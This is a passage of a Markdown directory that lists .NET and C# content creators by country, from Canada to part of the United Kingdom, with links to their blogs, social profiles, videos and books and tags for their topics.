| Maarten Balliauw | [Blog](https://blog.maartenballiauw.be/), [LinkedIn](https://www.linkedin.com/in/maartenballiauw/), [Mastodon](https://mastodon.online/@maartenballiauw), [Twitter](https://twitter.com/maartenballiauw) | .NET, C#, ASP.NET Core |

### Canada <img src="4x3/ca.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Anthony Giretti | [Blog](https://anthonygiretti.com/), [Twitter](https://twitter.com/anthonygiretti), [LinkedIn](https://www.linkedin.com/in/anthony-g-98670426/), [gRPC/ASP.NET (Book)](https://www.amazon.com/Beginning-gRPC-ASP-NET-Core-Applications/dp/1484280075) | .NET, C# |
| Derek Comartin | [YouTube](https://www.youtube.com/channel/UC3RKA4vunFAfrfxiJhPEplw), [Blog](https://codeopinion.com), [LinkedIn](https://www.linkedin.com/in/dcomartin/), [Twitter](https://twitter.com/codeopinion) | Architecture, .NET |
| Frank Liu | [YouTube](https://www.youtube.com/c/FrankLiuSoftware/), [Site](https://frankliucs.com), [Blog](https://frankliucs.com/blog/), [Twitter](https://twitter.com/frankliucs) | Blazor, ASP.NET Core |
| Gérald Barré | [Blog](https://www.meziantou.net/), [Twitter](https://twitter.com/meziantou), [Mastodon](https://hachyderm.io/@meziantou), [GitHub](https://github.com/meziantou), [LinkedIn](https://www.linkedin.com/in/meziantou/) | .NET, ASP.NET Core, Blazor, C# |
| Jhonatan Oliveira | [Blog](https://blog.jhonatanoliveira.dev/), [GitHub](https://github.com/jhonatanfernando), [Twitter](https://twitter.com/jhonatanfoliv), [LinkedIn](https://www.linkedin.com/in/jhonatanfernando/) | .NET, C#, ASP.NET Core, .NET MAUI |
| Jonathan Dick | [GitHub](https://github.com/redth), [Blog](https://redth.codes/), [Twitter](https://twitter.com/redth), [Mastodon](https://mas.to/@redth) | Microsoft, .NET MAUI, Xamarin, C# |
| Nick Cosentino (Dev Leader) | [Website](https://www.devleader.ca), [YouTube](https://www.youtube.com/@devleader), [TikTok](https://www.tiktok.com/@devleader), [Twitter](https://www.twitter.com/devleaderca), [All Dev Leader Links](https://linktr.ee/devleader) | .NET, C#, Tutorials, Microsoft, Unity3D |
| Richard Campbell | [Podcast (.NET Rocks!)](https://www.dotnetrocks.com/), [LinkedIn](https://www.linkedin.com/in/richjcampbell/), [Twitter](https://twitter.com/richcampbell) | Podcast, .NET |

### Costa Rica <img src="4x3/cr.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| José Pablo Ramírez Vargas | [Blog](https://webjose.hashnode.dev), [LinkedIn](https://www.linkedin.com/in/jos%C3%A9-pablo-ram%C3%ADrez-vargas-308b6180/), [Mastodon](https://dotnet.social/@webJose), [GitHub](https://github.com/webJose) | Architecture, .NET, ASP.NET Core, C# |

### Czech Republic <img src="4x3/cz.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Martin Zikmund | [Blog](https://blog.mzikmund.com/), [Twitter](https://twitter.com/mzikmunddev) | .NET, C#, Uno Platform |

### Denmark <img src="4x3/dk.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Erik Ejlskov Jensen | [Blog](https://erikej.github.io/), [Twitter](https://twitter.com/erikej) | EF Core, ADO.NET |
| Mark Seemann | [Blog](https://blog.ploeh.dk/), [Twitter](https://twitter.com/ploeh) | Architecture, .NET, F# |
| Niels Pilgaard | [Blog](https://pilgaard-blog.azurewebsites.net/), [Twitter](https://twitter.com/Niels_Pilgaard) | Blazor, C#, Azure |

### Dominican Republic <img src="4x3/do.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Leomaris Reyes | [Blog](https://askxammy.com/), [LinkedIn](https://www.linkedin.com/in/leomaris-reyes-1b598661), [Telerik](https://www.telerik.com/blogs/author/leomaris-reyes), [Twitter](https://twitter.com/leomarisreyes11) | .NET MAUI, Xamarin |
| Steven Checo | [Blog](https://checox.com) | .NET MAUI |

### Egypt <img src="4x3/eg.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Shady Nagy | [Blog](https://shadynagy.com/), [Twitter](https://twitter.com/ShadyNagy_) | .NET, ASP.NET Core |
| Ahmed Tarek | [Website](https://developmentsimplyput.com), [Blog](https://developmentsimplyput.com/blog), [LinkedIn](https://www.linkedin.com/in/atarekhasan), [Twitter](https://twitter.com/AhmedTarekHasa1) | .NET, ASP.NET Core |

### France <img src="4x3/fr.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Alexandre Nedelec | [Blog](https://www.techwatching.dev/), [Twitter](https://twitter.com/TechWatching), [LinkedIn](https://www.linkedin.com/in/alexandre-n%C3%A9d%C3%A9lec-24565549/) | .NET, C#, Azure |
| Alexis Chân GRIDEL | [Blog](https://agdl.dev), [Twitter](https://twitter.com/alexiscgridel), [LinkedIn](https://www.linkedin.com/in/alexisgridel/) | C#, .NET |
| Cyril Canovas | [Blog](https://goatreview.com/) | .NET, Akka.NET, Architecture |
| Daniel Lawson | [Twitter Threads](https://github.com/danylaws/my-twitter-threads), [Twitter](https://twitter.com/danylaws), [GitHub](https://github.com/danylaws) | C#, AWS |
| Jérémy BRUN-PICARD | [Blog](https://www.respawnsive.com/en/author/jeremy-brunpicardrespawnsive-com/), [Twitter](https://twitter.com/jbrunpicard), [LinkedIn](https://www.linkedin.com/in/jeremybrunpicard/) | .NET, Xamarin/MAUI, Architecture |
| Kevin Gosse | [Twitter](https://twitter.com/KooKiz), [Blog](https://minidump.net/) | .NET, C# |
| Laurent Egbakou | [Blog](https://lioncoding.com), [Twitter](https://twitter.com/lioncoding) | .NET, Azure |
| Laurent Kempé | [Blog](https://laurentkempe.com/), [Twitter](https://twitter.com/laurentkempe), [LinkedIn](https://www.linkedin.com/in/laurentkempe/) | .NET, C#, WebAssembly |
| Pierre Belin | [Blog](https://goatreview.com/), [LinkedIn](https://www.linkedin.com/in/pierre-belin/) | .NET, Akka.NET |
| Martin Finkel | [Blog](https://mfkl.github.io), [Twitter](https://twitter.com/martz2804), [LinkedIn](https://www.linkedin.com/in/martin-finkel-a9368571/), [Bio.Link](https://bio.link/mfkl) | .NET, Architecture |

### Germany <img src="4x3/de.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Holger Schwichtenberg | [Twitter](https://twitter.com/DOTNETDOKTOR) | .NET, C# |
| Julian Ewers-Peters | [Blog](https://ewerspej.hashnode.dev), [LinkedIn](https://linkedin.com/in/jewerspeters) | .NET, C#, MVVM, .NET MAUI, Xamarin.Forms |
| Patrick God | [Twitter](https://twitter.com/_PatrickGod), [YouTube](https://www.youtube.com/c/PatrickGod) | .NET, C#, ASP.NET Core, Blazor, EF Core |
| Thomas Claudius Huber | [Pluralsight](https://app.pluralsight.com/profile/author/thomas-huber), [Twitter](https://twitter.com/thomasclaudiush) | .NET, C#, Blazor, WinUI 3 |
| Tim Cadenbach | [Blog](https://www.tcdev.de/blog), [Twitter](https://twitter.com/timcadenbach) | .NET Core, ASP.NET Core |

### Greece <img src="4x3/gr.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Spyros Katsios | [YouTube](https://www.youtube.com/@spyroskatsios) | .NET, C# |

### India <img src="4x3/in.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Abdul Rahman | [Site](https://www.ilovedotnet.org), [LinkedIn](https://www.linkedin.com/in/fingers10/) | C#, .NET |
| Aditya Oberai | [Twitter](https://twitter.com/adityaoberai1), [LinkedIn](https://www.linkedin.com/in/adityaoberai1/), [Videos](https://oberai.dev/videos), [Blog](https://dev.to/adityaoberai/) | .NET, ASP.NET Web APIs, .NET MAUI, Azure |
| Anto Subash | [YouTube](https://www.youtube.com/c/AntoSubash), [Blog](https://blog.antosubash.com), [Twitter](https://twitter.com/antosubash) | .NET, Docker, ABP Framework |
| Anurag Sinha | [Blog](https://techncodetools.com/blog/), [Twitter](https://twitter.com/awesomeanurag) | C#, .NET |
| Bhrugen Patel | [YouTube](https://www.youtube.com/user/bhrugen1990), [Courses](https://www.dotnetmastery.com/) | .NET, ASP.NET Core, Blazor |
| Mukesh Murugan | [Blog](https://codewithmukesh.com/blog), [Twitter](https://twitter.com/iammukeshm), [LinkedIn](https://www.linkedin.com/in/iammukeshm/) | .NET, AWS |
| Nouman Rahman | [Blog](https://programmingfire.com), [Twitter](https://twitter.com/programmingfire) | .NET, C# |
| Saineshwar Bageri | [Blog](https://tutexchange.com), [Twitter](https://twitter.com/saihacksoft) | .NET, ASP.NET Core |
| Shailendra Chauhan | [YouTube](https://www.youtube.com/channel/UCuYuSB7JzDslrwwh8EM-4JA), [Twitter](https://twitter.com/proshailendra) | .NET, ASP.NET Core |
| Shivprasad Koirala | [YouTube](https://www.youtube.com/c/questpondvideos), [Twitter](https://twitter.com/questpond) | C#, .NET |
| Shreyas Jejurkar | [Blog](https://shreyasjejurkar.com) | .NET, ASP.NET Core |
| Tarun Saini | [YouTube](https://www.youtube.com/c/ASPNETMVCCORE), [Twitter](https://twitter.com/onetarun) | .NET, ASP.NET Core |
| Zahiruddin Tavargere | [Twitter](https://twitter.com/zahiruddin_t), [Blog](https://zahere.com/) | .NET, C# |

### Iran <img src="4x3/ir.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Meysam Hadeli | [GitHub](https://github.com/meysamhadeli), [Twitter](https://twitter.com/meysamhadeli), [Blog](https://meysamhadeli.com) | Microservices, .NET, ASP.NET Core |
| Mehdi Hadeli | [GitHub](https://github.com/mehdihadeli), [Twitter](https://twitter.com/mehdi_hadeli), [Blog](https://www.mehdihadeli.com/), [Blog RSS](https://www.mehdihadeli.com/rss) | Architecture, .NET, ASP.NET Core |
| Mohsen Rajabi | [GitHub](https://github.com/EngRajabi), [Twitter](https://twitter.com/mohsen_rajabi72), [Blog](https://medium.com/@mohsen_rajabi) | Microservices, .NET, ASP.NET Core, C# |
| Omid Ahmadpour | [GitHub](https://github.com/omid-ahmadpour), [LinkedIn](https://www.linkedin.com/in/omid-ahmadpour/), [YouTube](https://www.youtube.com/@withcodess), [Blog](https://medium.com/@omid-ahmadpour) | Microservices, .NET, C#, Clean Architecture, Clean Code, Azure |
| Saeed Esmaeelinejad | [LinkedIn](https://www.linkedin.com/in/saeed-esmaeelinejad/) | C#, EF, SQL Server, ASP.NET |

### Ireland <img src="4x3/ie.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Camilo Terevinto | [Blog](https://www.camiloterevinto.com), [LinkedIn](https://www.linkedin.com/in/camiloterevinto/), [Twitter](https://twitter.com/CTerevinto), [Blog RSS](https://www.camiloterevinto.com/rss.xml) | C#, ASP.NET Core, Azure |
| Dave Callan | [LinkedIn](https://www.linkedin.com/in/davidcallan/), [Twitter](https://twitter.com/DaveCallanIE) | C#, .NET, Visual Studio |
| Dominic Frei | [LinkedIn](https://www.linkedin.com/in/dominicfrei/), [Twitter](https://twitter.com/dominicfrei), [GitHub](https://github.com/DominicFrei), [Blog](https://www.mongodb.com/developer/author/dominic-frei/) | .NET, C#, Blazor, Unity3D, MongoDB |

### Israel <img src="4x3/il.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Amichai Mantinband | [YouTube](https://www.youtube.com/c/AmichaiMantinband/), [Twitter](https://twitter.com/amantinband/), [LinkedIn](https://www.linkedin.com/in/amantinband/) | .NET, ASP.NET Core |

### Italy <img src="4x3/it.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Andrea Chiarelli | [Blog](https://andreachiarelli.it/), [Twitter](https://twitter.com/andychiare), [LinkedIn](https://www.linkedin.com/in/andreachiarelli/) | .NET, C# |
| Andrea Tosato | [Mastering Minimal APIs in ASP.NET Core (Book)](https://www.packtpub.com/product/mastering-minimal-apis-in-aspnet-core/9781803237824), [LinkedIn](https://www.linkedin.com/in/andreatosato/), [Twitter](https://twitter.com/ATosato86) | .NET, C#, ASP.NET Core |
| Davide Bellone | [Blog](https://www.code4it.dev), [Twitter](https://twitter.com/BelloneDavide), [LinkedIn](https://www.linkedin.com/in/bellonedavide/) | .NET |
| Fabio Ramoni | [Twitter](https://twitter.com/developer_fabio), [Twitter Threads (GitHub)](https://github.com/FabioDeveloper92/developer_fabio_twitter_threads) | .NET, SQL |
| Marco Minerva | [Mastering Minimal APIs in ASP.NET Core (Book)](https://www.packtpub.com/product/mastering-minimal-apis-in-aspnet-core/9781803237824), [LinkedIn](https://www.linkedin.com/in/marcominerva/), [Twitter](https://twitter.com/marcominerva) | .NET, C#, ASP.NET Core |
| Renato Golia | [Blog](https://renatogolia.com/), [Twitter](https://twitter.com/Kralizek), [LinkedIn](https://www.linkedin.com/in/renatogolia/), [GitHub](https://github.com/Kralizek), [Mastodon](https://dotnet.social/@rengol) | .NET, ASP.NET Core, AWS, Serverless, Architecture, Infrastructure-as-Code, CI/CD |

### Jamaica <img src="4x3/jm.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Trevoir Williams | [YouTube](https://www.youtube.com/c/trevoirwilliams), [LinkedIn](https://www.linkedin.com/in/trevoirwilliams/), [Blog](https://www.trevoirwilliams.com/), [Udemy Profile](https://www.udemy.com/user/trevoirwilliams/) | .NET, ASP.NET Core, Azure, .NET MAUI |

### Japan <img src="4x3/jp.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Andrew KeepCoding | [YouTube](https://www.youtube.com/c/AndrewKeepCoding/), [Twitter](https://twitter.com/AndrewKeepCodin) | WinAppSDK, WinUI 3 |
| Ted Andersen | [YouTube](https://www.youtube.com/c/TedsTech), [Twitter](https://twitter.com/TedsTechTed) | .NET, C# |

### Kosovo <img src="4x3/xk.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Ledjon Behluli | [Blog](https://www.ledjonbehluli.com/), [Twitter](https://twitter.com/BehluliLedjon), [LinkedIn](https://www.linkedin.com/in/msc-ledjon-behluli-06b523155/) | .NET, C#, Architecture |

### Lebanon <img src="4x3/lb.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Ahmad Mozaffar | [YouTube](https://www.youtube.com/channel/UCRs-PO48PbbS0l7bBhbu5CA), [Twitter](https://twitter.com/ahmadmozaffar99) | .NET, Azure |
| Hasan Aboul | [YouTube](https://www.youtube.com/channel/UCiLmLn593TxhOLpvbOfJFRg/featured), [YouTube](https://www.youtube.com/c/heducate), [Blog](https://learnwithhasan.com), [Twitter](https://twitter.com/h_educate) | .NET |

### Malawi <img src="4x3/mw.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Simuzeche Kaluwa | [YouTube](https://www.youtube.com/channel/UCQw4zDb735eezImafcyYlWg), [Twitter](https://twitter.com/simuzeche) | .NET, ASP.NET Core |

### Mauritius <img src="4x3/mu.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Patrick Smacchia | [Blog](https://blog.ndepend.com), [Twitter](https://twitter.com/ndepend), [LinkedIn](https://www.linkedin.com/in/patrick-smacchia-b0123110/) | .NET, C#, Architecture, ndepend |

### Netherlands <img src="4x3/nl.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Albert Starreveld | [Blog](https://medium.com/@abstarreveld), [LinkedIn](https://www.linkedin.com/in/albert-starreveld/) | .NET, Azure, C# |
| Erwin Staal | [Blog](https://erwinstaal.nl/), [Twitter](https://twitter.com/erwin_staal) | DevOps, Azure |
| Fanie Reynders | [YouTube](https://youtube.com/faniereynders), [Twitch](https://twitch.tv/faniereynders), [Blog](https://reynders.co/blog/), [Twitter](https://twitter.com/FanieReynders) | .NET, Azure |
| Fons Sonnemans | [Blog](https://reflectionit.nl/blog), [Twitter](https://twitter.com/fonssonnemans), [GitHub](https://github.com/sonnemaf) | C#, .NET, ASP.NET, WinUI |
| Geert van der Cruijsen | [Blog](https://fullcycledeveloper.com/), [Twitter](https://twitter.com/geertvdc) | DevOps, Azure |
| Gerald Versluis | [YouTube](https://www.youtube.com/c/GeraldVersluis), [Blog](https://blog.verslu.is/), [Twitter](https://twitter.com/jfversluis) | .NET MAUI, Blazor, C# |
| Henrique Siebert Domareski | [Blog](https://henriquesd.medium.com), [LinkedIn](https://www.linkedin.com/in/henriquesd) | .NET, Azure |
| Louëlla Creemers | [Blog](https://lovelacecoding.hashnode.dev/), [Twitter](https://twitter.com/lovelacecoding), [Bio.Link](https://bio.link/lovelacecoding) | .NET, C#, Architecture |
| Marc Duiker | [YouTube](https://www.youtube.com/c/marcduiker-serverless), [Blog](https://blog.marcduiker.nl), [Twitter](https://twitter.com/marcduiker) | Azure Functions, Serverless |
| Max Hamulyák | [Blog](https://kaylumah.nl/blog), [Mastodon](https://fosstodon.org/@kaylumah@mastodon.nl), [Twitter](https://twitter.com/kaylumah), [LinkedIn](https://www.linkedin.com/in/maxhamulyak/) | .NET, C# |
| Michiel van Oudheusden | [Blog](https://mindbyte.nl/), [Mastodon](https://mastodon.social/@mivano), [Twitter](https://www.twitter.com/mivano), [LinkedIn](https://www.linkedin.com/in/michielvanoudheusden), [Newsletter](https://mindbyte.beehiiv.com) | Azure, GitHub, ALM, Remote Work |
| Rob Bos | [Blog](https://devopsjournal.io/), [Mastodon](https://fosstodon.org/@Rob_Bos@mstdn.social), [LinkedIn](https://www.linkedin.com/in/bosrob/), [GitHub](https://github.com/rajbos) | DevOps, GitHub |
| Roland Guijt | [Pluralsight](https://app.pluralsight.com/profile/author/roland-guijt), [Twitter](https://twitter.com/rolandguijt), [LinkedIn](https://www.linkedin.com/in/rolandguijt) | .NET, ASP.NET Core |
| Stacy Cashmore | [Twitter](https://twitter.com/Stacy_Cash), [Mastodon](https://tech.lgbt/@StacyClouds), [Beginning Static Web Apps with Blazor (Book)](https://link.springer.com/book/10.1007/978-1-4842-8146-8), [Blog](https://www.stacy-clouds.net/blog-posts) | .NET, Azure Static Web Apps |

### New Zealand <img src="4x3/nz.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Jakub Chodounský | [Newsletter (csharpdigest.net)](https://csharpdigest.net/), [Twitter](https://twitter.com/jakubgarfield), [Blog](https://chodounsky.com/) | .NET |

### North Macedonia <img src="4x3/mk.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Bojan Veljanovski | [Blog](https://bojanveljanovski.com/), [LinkedIn](https://www.linkedin.com/in/bojanv91/) | .NET, C#, SQL |

### Norway <img src="4x3/no.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Andreas Nesheim | [Blog](https://www.andreasnesheim.no/), [Twitter](https://twitter.com/AndreasNesheim), [LinkedIn](https://www.linkedin.com/in/andreas-nesheim/) | .NET MAUI, Xamarin |
| Kris Devochko | [Blog](https://kristhecodingunicorn.com/post/), [Twitter](https://twitter.com/kristhecodingu1), [LinkedIn](https://www.linkedin.com/in/krisde/) | Azure, Kubernetes |

### Pakistan <img src="4x3/pk.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Muhammad Waseem | [.NET Newsletter](https://mwaseemzakir.substack.com/), [Twitter](https://twitter.com/mwaseemzakir), [LinkedIn](https://www.linkedin.com/in/mwaseemzakir/), [Facebook](https://facebook.com/IamMuhammadWaseemZakir), [Medium](https://medium.com/@mwaseemzakir) | .NET, C#, Entity Framework |

### Philippines <img src="4x3/ph.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Satya Karki | [Blog](https://rijsat.com/), [LinkedIn](https://www.linkedin.com/in/satya-karki-a506b473/), [YouTube](https://www.youtube.com/@RijSat) | .NET, C# |
| Rijwan Ansari | [Blog](https://rijsat.com/), [LinkedIn](https://www.linkedin.com/in/rijwanansari/), [Twitter](https://twitter.com/rijsat), [YouTube](https://www.youtube.com/@RijSat) | .NET, C# |

### Poland <img src="4x3/pl.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Szymon Kulec | [Blog](https://blog.scooletz.com/), [Twitter](https://twitter.com/Scooletz), [LinkedIn](https://www.linkedin.com/in/szymon-kulec/) | .NET, C# |
| Oleg Kyrylchuk | [Blog](https://blog.okyrylchuk.dev/), [Twitter](https://twitter.com/okyrylchuk), [LinkedIn](https://www.linkedin.com/in/okyrylchuk/) | .NET, C# |
| Oskar Dudycz | [Blog](https://event-driven.io/en/), [Twitter](https://twitter.com/oskar_at_net), [LinkedIn](https://www.linkedin.com/in/oskardudycz/), [Mastodon](https://hachyderm.io/@oskardudycz) | .NET, Event-Driven Architecture |

### Portugal <img src="4x3/pt.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Antão Almada | [Blog](https://antao-almada.medium.com/), [LinkedIn](https://www.linkedin.com/in/antaoalmada/) | .NET, C# |
| Guilherme Ferreira | [Blog](https://gsferreira.com), [YouTube](https://www.youtube.com/user/guilhermeasferreira), [Twitter](https://twitter.com/gsferreira), [LinkedIn](https://www.linkedin.com/in/gferreira/) | .NET, C#, Architecture |
| João Antunes | [YouTube](https://www.youtube.com/c/CodingMilitia), [Twitter](https://twitter.com/joaofbantunes), [Blog](https://blog.codingmilitia.com), [LinkedIn](https://www.linkedin.com/in/joaofbantunes/), [Mastodon](https://mastodon.social/@joaofbantunes) | .NET, C# |

### Romania <img src="4x3/ro.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Dan Patrascu-Baba | [YouTube](https://www.youtube.com/channel/UCyTPru-1gZ7-4qblcKM0TiQ), [Twitter](https://twitter.com/danpdc), [LinkedIn](https://www.linkedin.com/in/dan-patrascu-baba-08b78523/) | .NET, C# |
| Irina Scurtu | [Blog](https://irina.codes/), [Twitter](https://twitter.com/irina_scurtu), [GitHub](https://github.com/irinascurtu), [LinkedIn](https://www.linkedin.com/in/irinascurtu/) | .NET, C# |
| Valentin Anghel | [Blog](https://programmingcsharp.com/), [Twitter](https://twitter.com/sharpprograming) | .NET, C# |

### Serbia <img src="4x3/rs.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Marinko Spasojevic | [Blog](https://code-maze.com/), [LinkedIn](https://www.linkedin.com/in/marinko-spasojevic-95bb023b/) | .NET, ASP.NET Core, Blazor, C# |
| Dr. Milan Milanović | [LinkedIn](https://www.linkedin.com/in/milanmilanovic/), [Blog](https://milan.milanovic.org/post/), [Twitter](https://twitter.com/milan_milanovic), [Newsletter](https://newsletter.techworld-with-milan.com/) | .NET, C#, Azure, Architecture |
| Milan Jovanović | [Blog](https://www.milanjovanovic.tech/blog), [LinkedIn](https://www.linkedin.com/in/milan-jovanovic), [YouTube](https://www.youtube.com/c/MilanJovanovicTech), [Twitter](https://twitter.com/mjovanovictech) | .NET, C#, Architecture |
| Stefan Djokic | [LinkedIn](https://www.linkedin.com/in/djokic-stefan/), [Twitter](https://twitter.com/TheCodeMan__), [Blog](https://www.exlrt.com/blog?a=stefan-djokic) | .NET, C#, Architecture, EntityFramework |
| Zoran Horvat | [Twitter](https://twitter.com/zoranh75), [Blog](https://codinghelmet.com/articles), [YouTube](https://www.youtube.com/c/zh-code) | .NET, C#, Architecture |

### South Africa <img src="4x3/za.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Ivan Kahl | [Site](https://ivankahl.com/), [Blog](https://blog.ivankahl.com/), [YouTube](https://www.youtube.com/c/IvanKahl), [Twitter](https://twitter.com/IvanKahl) | .NET, C# |

### Sweden <img src="4x3/se.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Alan Smith | [YouTube](https://www.youtube.com/c/CloudCastsAlanSmith), [Twitter](https://twitter.com/alansmith) | Azure AI |
| Daniel Hindrikes | [Twitter](https://twitter.com/hindrikes), [YouTube](https://www.youtube.com/c/DanielHindrikes), [Blog](https://danielhindrikes.se/) | .NET MAUI, Blazor, Azure |
| Jessica Engstrom | [Podcast](https://www.codingafterwork.com/), [Twitter](https://twitter.com/engstromjess), [Twitch](https://www.twitch.tv/codingafterwork) | .NET, Blazor, Podcast |
| Jimmy Engström | [Podcast](https://www.codingafterwork.com/), [Twitter](https://twitter.com/EngstromJimmy), [Blog](https://engstromjimmy.com/) | .NET, Blazor, Podcast |
| Jonah Andersson | [Twitter](https://twitter.com/cjkodare), [Linktree](https://linktr.ee/jonahandersson), [Blog](https://jonahandersson.tech/blog/) | .NET, C#, Azure |
| Simon Wåhlin | [Twitter](https://twitter.com/SimonWahlin), [YouTube](https://www.youtube.com/c/SimonAutomates), [Blog](https://blog.simonw.se/) | PowerShell, Azure |

### Switzerland <img src="4x3/ch.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Claudio Bernasconi | [YouTube](https://youtube.com/claudiobernasconi), [Twitter](https://twitter.com/CHBernasconiC), [Blog](https://www.claudiobernasconi.ch/) | .NET, .NET MAUI |
| Damien Bowden | [Blog](https://damienbod.com), [Twitter](https://twitter.com/damien_bod) | ASP.NET Core, OpenID Connect, OAuth |
| Emanuele Bartolesi | [Blog](https://dev.to/kasuken), [Blog RSS](https://dev.to/feed/kasuken), [Twitter](https://twitter.com/kasuken), [Mastering Minimal APIs in ASP.NET Core (Book)](https://www.packtpub.com/product/mastering-minimal-apis-in-aspnet-core/9781803237824) | .NET, Blazor, Azure |
| Marco Siccardi | [Blog](https://msicc.net/), [Mastodon](https://mastodon.social/@msicc), [LinkedIn](https://www.linkedin.com/in/msicc/) | .NET, C#, Xamarin |
| Matthias Güntert | [Blog](https://www.azureblue.io/), [LinkedIn](https://www.linkedin.com/in/matthiasguentert/) | Azure, ASP.NET Core |
| Matthias Jost | [Blog](https://www.matthias-jost.ch/en/), [LinkedIn](https://www.linkedin.com/in/matthias-jost/), [Twitter](https://twitter.com/jost0101), [Bio Link](https://matthiasjost.bio.link/) | .NET, C# |
| Jürgen Gutsch | [Blog](https://asp.net-hacker.rocks), [Twitter](https://twitter.com/sharpcms/) | ASP.NET Core |
| Steven Giesel | [Blog](https://steven-giesel.com), [LinkedIn](https://www.linkedin.com/in/steven-giesel/) | .NET, C#, Blazor |
| Wolfgang Ofner | [Blog](https://programmingwithwolfgang.com/), [LinkedIn](https://www.linkedin.com/in/wolfgangofner/), [Twitter](https://twitter.com/wolfgang_ofner) | Azure, Kubernetes |

### Turkey <img src="4x3/tr.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Berkan Sasmaz | [Blog](https://berkansasmaz.com/), [Twitter](https://twitter.com/berkansasmazz), [LinkedIn](https://www.linkedin.com/in/berkansasmaz/) | ABP Framework, .NET, Architecture |
| Engincan Veske | [Blog](https://engincanv.github.io/), [Twitter](https://twitter.com/EngincanVeske), [LinkedIn](https://www.linkedin.com/in/engincanv/) | ABP Framework, .NET, C# |
| Furkan Gözükara | [YouTube](https://www.youtube.com/SECourses), [Twitter](https://twitter.com/gozukarafurkan), [LinkedIn](https://www.linkedin.com/in/furkangozukara/) | .NET, C# |
| Okan Can Karadağ | [Blog](https://okankaradag.com/en/), [LinkedIn](https://www.linkedin.com/in/okancankaradag/) | .NET, C# |

### Ukraine <img src="4x3/ua.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Oleksii Nikiforov | [Blog](https://nikiforovall.github.io), [Twitter](https://twitter.com/nikiforovall), [LinkedIn](https://www.linkedin.com/in/nikiforov-oleksii/) | .NET, C#, ASP.NET |
| Vladislav Antonyuk | [Blog](https://vladislavantonyuk.github.io), [LinkedIn](https://www.linkedin.com/in/vladislav-antonyuk) | .NET, C#, .NET MAUI, Blazor, Azure |

### United Kingdom (A-J) <img src="4x3/gb.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Andrea Angella | [Blog](https://www.productivecsharp.com/blog/), [Site](https://www.productivecsharp.com/), [LinkedIn](https://www.linkedin.com/in/andreaangella/), [YouTube](https://www.youtube.com/c/AndreaAngella), [Twitter](https://twitter.com/angella_andrea) | .NET, C# |
| Andrew Lock | [Blog](https://andrewlock.net/), [Twitter](https://twitter.com/andrewlocknet), [LinkedIn](https://www.linkedin.com/in/andrewdlock/), [Mastodon](https://hachyderm.io/@andrewlock) | .NET, C#, ASP.NET Core |
| Anton Wieslander | [YouTube](https://www.youtube.com/c/RawCoding), [Twitter](https://twitter.com/anton_t0shik), [GitHub](https://github.com/T0shik) | .NET, C#, ASP.NET Core |
| Chris Sainty | [Twitter](https://twitter.com/chris_sainty), [Blog](https://chrissainty.com/), [Blazor in Action (Book)](https://bit.ly/blazorinaction), [Mastodon](https://mstdn.social/@chrissainty) | Blazor |
| Dan Clarke | [Blog](https://www.danclarke.com/), [Podcast](https://unhandledexceptionpodcast.com/), [YouTube](https://www.youtube.com/@danclarkeuk), [Twitter](https://twitter.com/dracan), [Mastodon](https://mstdn.social/@danclarke) | Podcast, .NET |
| Dave Murray | [Blog](https://blog.taranissoftware.com/), [LinkedIn](https://www.linkedin.com/in/dave-murray-glasgow/), [Mastodon](https://mastodon.scot/@irongut) | Xamarin |
| David Grace | [Blog](https://www.roundthecode.com/), [YouTube](https://www.youtube.com/roundthecode), [Twitter](https://twitter.com/roundthecode) | .NET, C#, ASP.NET Core |
| Dustin Moris Gorski | [Blog](https://dusted.codes/), [Twitter](https://twitter.com/dustinmoris), [LinkedIn](https://www.linkedin.com/in/dustinmoris/) | .NET, C#, ASP.NET Core |
| Gavin Lon | [YouTube](https://www.youtube.com/c/GavinLon/), [GitHub](https://github.com/gavinlondigital) | .NET, Blazor |
| James Eastham | [YouTube](https://www.youtube.com/channel/UCutBMcgLfbSfRL-MB5Bskxg), [Site](https://serverlessdotnet.dev/), [Blog](https://jameseastham.co.uk/), [Mastodon](https://hachyderm.io/@plantpowerjames), [LinkedIn](https://www.linkedin.com/in/james-eastham/) | AWS, Serverless, .NET, C# |
| Jamie Maguire | [Blog](https://jamiemaguire.net/), [Twitter](https://twitter.com/jamie_maguire1), [LinkedIn Learning](https://www.linkedin.com/learning/instructors/jamie-maguire), [LinkedIn](https://www.linkedin.com/in/jamiemaguiredotnet/) | Azure AI, .NET |
